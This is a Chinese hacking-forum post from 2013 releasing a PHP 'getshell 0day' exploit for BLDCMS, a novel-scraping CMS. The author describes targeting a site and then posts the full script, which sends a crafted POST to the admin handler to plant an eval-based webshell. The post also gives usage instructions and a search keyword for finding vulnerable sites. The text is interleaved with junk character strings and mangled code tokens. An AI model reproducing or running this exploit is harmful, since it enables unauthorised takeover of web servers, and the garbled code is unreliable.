之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞+ U1 h3 Z: ]8 I4 x3 y* I5 _! ^
) l. T" W3 B, D8 v% L 7 R2 a, T2 g$ ^( s# t3 W
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 ' I9 N. t2 @- R4 H) W
8 g+ ^' R0 r# ^ c0 m
既然都有人发了 我就把我之前写好的EXP放出来吧0 V# l* L ~+ W
/ o) a1 W- Y5 uview source print?01.php;">
( Q+ @& W+ q: X% Z: x02.<!--?php
9 v4 p. c1 c2 y" V03.echo "-------------------------------------------------------------------" T. e1 P9 Y x. k1 n0 g+ S
04. ! n$ b$ k8 T% E$ i$ {
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP1 g* T" ?) n0 l" z- j; [0 _
06.
" t. k. u( e0 ~3 q7 z T: m07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun# Y1 i `, J9 u2 U7 c& ~
08.
. R/ n; K9 E9 ~' e09.QQ:981009941\r\n 2013.3.21\r\n
9 B. n/ i- H2 |7 x( X/ ~4 _# v) a10. y1 O" O c# ?
11.
8 D6 S( T9 {$ i0 \12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码4 G0 ?( F% r6 X1 W6 d
13. $ J" a0 r1 W1 {- h+ V- Q. `
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
$ T7 Z, C, P* U" K- K15.
1 U% X4 z5 j& \0 R1 v16.--------------------------------------------------------------------\r\n";
: _4 {5 ^& I( m( r1 l c! K17.$url=$argv[1];; a: H6 Z$ R" m/ o& M
18.$dir=$argv[2];0 G, V/ S( b% W% K! a E& K
19.$pass=$argv[3];
" w1 N3 {8 {2 E! c. Q# e- C7 V" Q20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';3 I% Z; Q) W8 N0 p% I: j
21.if (emptyempty($pass)||emptyempty($url)). d) t- C9 g* r- L' v0 C
22.{exit("请输入参数");}6 N M: Q D1 Q0 P
23.else% y; u2 ]5 P9 Z1 s/ E3 j
24.{; r) E9 b* z3 o5 s7 N1 O
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev! B4 i8 i" l% x" p' q: e
26.
" ~9 f- f: A& f4 N+ u27.al;
& u9 g4 f2 @0 y28.$length = strlen($fuckdata);
$ c8 M0 n! K3 C# {29.function getshell($url,$pass)
8 R+ K9 o2 o* W: c30.{
! p1 ]# c3 B4 [8 y31.global $url,$dir,$pass,$eval,$length,$fuckdata;
8 M" Q. `* U2 k6 I32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
8 h% P1 j7 b8 T33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";8 ]8 B2 D9 ?" j) B( v. C! L
34.$header .= "User-Agent: MSIE\r\n";0 B% ?+ ]' P& `% H; ?$ Y
35.$header .= "Host:".$url."\r\n";
9 y5 w9 l1 ?, b- E3 w* O36.$header .= "Content-Length: ".$length."\r\n";
1 M. J" k3 X. Y37.$header .= "Connection: Close\r\n"; O' b' w) @: T( _
38.$header .="\r\n";
9 B& c" D! s- k2 W/ n. E39.$header .= $fuckdata."\r\n\r\n";& s% `4 |6 P; g/ e; y
40.$fp = fsockopen($url, 80,$errno,$errstr,15);
, D$ b: i C) f. u) C41.if (!$fp)2 A! f, I; ~+ c
42.{8 \+ O1 ]8 G" ^- k& |9 ?# Z) O
43.exit ("利用失败:请检查指定目标是否能正常打开");
5 Q2 b' f9 R ]4 B" R( _44.}
: S& J% q9 l# \/ V45.else{ if (!fputs($fp,$header))% j+ f" G/ \! m- k$ K, f
46.{exit ("利用失败");}
$ Z- L* N- j0 \) J/ g6 z47.else
5 I" @) J! Y0 h" V48.{% x. U: g7 |+ _2 U0 ?0 D
49.$receive = '';
7 ] {0 {% I, v50.while (!feof($fp)) {
+ C5 A1 r; ?) |2 R5 X) z* ~51.$receive .= @fgets($fp, 1000);
% l1 C, b. h2 v( |6 [52.}
/ E- I* k! \2 B* ]) x( s5 N53.@fclose($fp);" a1 |4 B- G8 r: M
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标! L% i" A" p6 Q1 ]1 B( V4 [
55. " Q- m9 Y- y8 N- B1 R* f
56.GPC是否=off)";4 S; c% i$ G+ d5 C$ m
57.}}
$ {& q: z" d5 \5 E58.}+ H5 i& v* S3 e( Q( b
59.}- ^% o4 W# \4 U% v+ K
60.getshell($url,$pass);! {6 x. u5 o' Q6 E" A
61.?-->* ~- Z) r n v6 v% M6 q8 W
M {5 C3 A& Y, @& J5 g/ E
. ~ ^6 H$ o6 T& @ / G: Q' s, |6 b4 Q
by 数据流
7 Q8 h1 h7 ]0 d |
发表于 2013-3-26 20:49:10
收藏
支持
反对